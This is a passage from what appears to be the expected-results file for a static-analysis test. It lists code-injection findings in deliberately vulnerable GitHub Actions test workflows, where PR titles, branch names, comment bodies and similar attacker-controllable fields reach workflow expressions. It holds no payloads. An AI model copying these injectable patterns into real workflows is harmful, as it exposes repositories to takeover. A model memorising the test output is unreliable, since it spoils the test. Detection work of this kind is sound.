.github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). 
